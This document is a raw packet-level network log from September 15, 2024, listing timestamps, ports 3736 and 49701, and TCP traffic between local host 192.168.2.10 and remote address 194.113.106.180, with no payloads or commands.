Sep 15, 2024 15:02:27.959983110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.959995985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.960017920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.960051060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.960067034 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.961018085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961061001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961071968 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.961112976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961146116 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961152077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.961179972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961225986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961234093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.961261034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961294889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.961307049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.971024990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971080065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971085072 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.971116066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971165895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.971168041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971201897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971237898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971249104 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.971251965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.971296072 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.978210926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978245020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978276968 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978308916 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.978357077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978452921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978486061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978502989 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.978522062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978526115 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.978555918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.978604078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.982343912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982395887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982431889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982451916 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.982465029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982500076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982508898 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.982532978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982568979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.982583046 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.987308979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987359047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987413883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.987422943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987456083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987488985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987507105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.987524033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987529039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.987560034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.987602949 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.988296032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988348007 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988379955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988405943 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.988547087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988580942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988616943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988632917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.988650084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988658905 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.988682985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.988733053 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.989007950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989078999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989228964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989283085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989284039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.989332914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989368916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989382982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.989403963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989439011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989444017 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.989468098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.989514112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.992484093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992533922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992585897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992607117 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.992619991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992662907 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.992671967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992705107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992742062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992754936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.992774963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.992821932 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.996799946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.996859074 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.996876955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.996927977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.996962070 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.996977091 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.996995926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.997030020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.997062922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.997088909 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.997539043 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.998682022 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998738050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998771906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998796940 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.998805046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998840094 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998852968 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.998872995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998908997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998946905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.998969078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.998997927 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.004075050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004143000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004174948 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004225969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004235983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.004261017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004282951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.004293919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004309893 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004324913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.004347086 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.004369974 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.015084028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015320063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015330076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015340090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015345097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015356064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015366077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.015446901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.015448093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.043886900 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.043963909 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.043973923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044030905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044064999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044085026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044125080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044158936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044171095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044214010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044265032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044266939 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044301033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044337034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044372082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044384003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044405937 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044410944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044442892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044476986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044483900 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044496059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044528008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044534922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044586897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044620991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044648886 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044656038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044699907 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.044708967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044749022 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.044790030 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.050380945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050434113 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050487041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050487995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.050522089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050560951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050563097 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.050574064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050611019 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050623894 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.050642014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.050697088 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.051690102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051743984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051779985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051814079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051831007 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.051848888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051856041 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.051883936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051918983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051948071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.051959991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.052870989 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.061681986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.061738014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.061791897 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.061798096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.061889887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.061923981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.061959028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.061969042 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.061994076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.062028885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.062043905 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.062076092 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.069125891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069158077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069214106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069250107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069263935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.069284916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069319963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069328070 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.069359064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069364071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.069400072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.069442034 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.072837114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.072871923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.072922945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.072925091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.072961092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.072995901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.073004007 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.073031902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.073067904 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.073111057 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.077909946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.077939987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.077974081 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.077994108 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.078028917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.078062057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.078072071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.078097105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.078097105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.078145981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.078181982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.078195095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079153061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079186916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079209089 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079240084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079273939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079308987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079314947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079343081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079361916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079420090 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079437971 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079782963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079835892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079869986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079886913 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079922915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079957008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.079966068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.079992056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.080028057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.080035925 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.083203077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083255053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083261013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.083290100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083323956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083340883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.083374977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083422899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083457947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083462954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.083493948 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.083507061 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.090714931 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.090765953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.090836048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.090871096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.090924978 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.091006041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091110945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091145992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091159105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.091186047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091213942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091232061 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.091926098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091958046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.091980934 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.092010975 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.092058897 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.092077971 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.092112064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.092147112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.092155933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.092181921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.092220068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.092231035 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.094754934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.094808102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.094809055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.094842911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.094877005 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.094890118 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.094913006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.094948053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.094975948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.094983101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.095016956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.095030069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.105876923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.105907917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.105942965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.105964899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.106003046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.106014013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.106036901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.106040955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.106044054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.106059074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.106084108 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.106122017 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134514093 CEST	3736	49701	194.113.106.180	192.168.2.10
